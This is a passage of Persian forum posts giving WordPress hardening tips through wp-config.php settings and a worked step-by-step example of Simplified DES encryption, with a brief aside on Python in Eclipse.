افزونه از ربات ها و اسکریپت ها جهت بروت فورس جلوگیری می کند. 3- غیرفعال کردن چند منو و همچنین اپدیت اتوماتیک وردپرس با اضافه کردن کد زیربه فایل wp-config.php می توان منوهای "افزودن ، ویراشگر" را در قسمت افزونه ها و "ویرایشگر" در قسمت نمایش و همچنین آپدیت خودکار وردپرس را غیرفعال کرد. define('DISALLOW_FILE_EDIT',true); define('DISALLOW_FILE_MODS', true); define( 'WP_AUTO_UPDATE_CORE', false ); تهیه نسخه پشتیبان بک آپ از سایت از مهترین کارهایی که یک مدیر وب سایت باید انجام دهد تهیه بک آپ از سایت خود است.سعی کنید همیشه آخرین بک آپ خود را بازگردانی کنید و برای اطمینان خاطر بیشتر نسخه های قبلی بک آپ را هم داشته باشید. موفق باشید.
  14. LordBlack

    از سال 2003 که این افزونه معرفی شده میتوان در محیط اکلیپس با زبان پایتون برنامه نوشت جای تعجب نداره .
  15. LordBlack

    با بخش دوم آموزش رمزنگاری DES در خدمتتون هستم در این بخش با استفاده از ابزار SDES Simulator که قبلا در اینجا معرفی کردم مثال کاملی از SDES رو با هم کار میکنیم . برای اینکه مطالب رو بهتردرک کنید من مراحل رو شماره گذاری کردم و در مورد هرمرحله توضیحات رو خدمتتون عرض میکنم . مرحله 1 : همان طور که قبلا گفتم دو کلید k1, k2 وجود دارد که این دو کلید از یک کلید 10 بیتی برای ما درست میشد که در مراحل رمزنگاری ما از آن استفاده میکنیم. در مرحله ی یک کلید 10 بیتی به P10 تبدیل شده است که فرمول آن به این صورت : یعنی به ازای k1 ما k3 رو داریم در واقع بیت اول با بیت سوم و در ادامه k2 با k5 بیت دوم با بیت پنجم و... مرحله 2 : بیت حاصل از P10 رو به دو قسمت تبدیل میکنیم و در (LS-1 (left shift سمت چپ 1 بیت به سمت چپ شیفت میکنیم و در (LS-1 (left shift سمت راست هم 1 بیت به سمت چپ شیفت میکنیم. مرحله 3 : در این مرحله بیت های حاصل از (LS-1 (left shift رو دو بار شیفت میکنیم به سمت چپ که (LS-2 (left shift تولید میشود. مرحله 4 : در مرحله 4 ما دو پنج بیتی حاصل از (LS-1 (left shift رو میبریم به P8 که فرمول P8 به این صورت : و برای ما کلید K1 به دست میاد . برای (LS-2 (left shift هم به همین صورت عمل میکنیم . مرحله 5 : درمرحله 5 ما بیت 8 بیتی رو به تابع IP میبریم که فرمول تابع IP به این صورت : مرحله 6 : در مرحله 6 فقط چهار بیت سمت راست حاصل از تابع IP رو وارد تابع EP میکنیم که فرمول تابع EP به این صورت : بیت های حاصل از تابع IP ای پی 01010111 که 4 تا سمت راست و 4 تا سمت چپ جدا میکنیم 0111 0101 طبق فرمول تابع EP فقط چهار بیت سمت راست رو وارد تابع میکنیم که میشود 10111110 مرحله ی 7 : بعد از اینکه expansion به دست اومد با کلید K1 اونو XOR میکنیم : 10111110 ⊕ Xor با K1 01000110 مرحله ی 8 : بعد از اینکه 8 بیت به دست آمد دوباره میایم اونو به دوقسمت 4 بیت سمت چپ و 4 بیت سمت راست تبدیل میکنیم 01000110 و قراره اونا رو در S-BOX وارد کنیم . قبلا گفتیم که در ماتریس S-BOX به ازای یک ورودی خاص یک خروجی رو داریم در S-Box ما رقم اول و آخر رو به عنوان شماره سطر میشناسیم و رقم های وسط رو به عنوان شماره ستون ماتریس S-Boxبه صورت زیر : ابتدا چهار بیت سمت چپ رو به S-Box S0 میبریم : 0100 1.رقم اول و آخر میشود 00 بنابراین شماره ستون صفر 2.دو رقم وسط 10 می شود 2 و متناظر با سطر شماره ی صفر عدد 3 به دست میاد ما اگه 3 رو به باینری ببیریم میشود 11 چهاربیت سمت راست رو به S1 S-Box میبریم : 0110 1. رقم اول و آخر میشود 00 بنابراین شماره ستون صفر 2. دو رقم وسط 11 میشود 3 و متناظر با سطر شماره ی صفر عدد 3 به دست میاد ما اگه 3 رو به باینری ببیریم میشود 11 بنابراین داریم 1111 مرحله ی 9 : چهاربیت به دست آمده از S-Box رو به تابع P4 میبریم : تابع P4 به صورت زیر : چون تمام چهار بیت ما 1111 هستند بنابراین 1111 به دست می آید. مرحله ی 10 : در این مرحله فقط چهاربیت به دست آمده از تابع P4 رو با چهار بیت سمت چپ تابعIP XOR می کنیم و سپس چهاربیت به سمت راست رو دیگه XOR نمیکنیم و مستقیم میاد کنار چهاربیتی که XOR شده اند میزاریم. از مرحله ی 6 تا 10 ما طبق این فرمول عمل کردیم. مرحله ی 11 : تا این مرحله بیت به دست آمده به این صورت 10100111 در این مرحله عمل swap رو انجام میدیم که بیت زیر به دست میاد . 01111010 مرحله ی 12 : در این مرحله ما طبق مراحل 6 تا 10 عمل میکنیم . مرحله نهایی : تا این مرحله بیتی که به دست آمده به این صورت : 10001010 در نهایت اونو به تابع IP’ مبیریم که این تابع به این صورت : که با جایگذاری بیت زیر که متن cipher text هستش به دست میاد . 01011000 Cipher Text منابع : ویکی پدیا کتاب Cryptography and Network Security بهروز فروزان کتاب APPENDIIX G SIIMPLIIFIIED DES نویسنده William Stallings انشاالله به زودی ویدوی آموزش رمزنگاری DES رو هم قرار میدم . موفق باشید.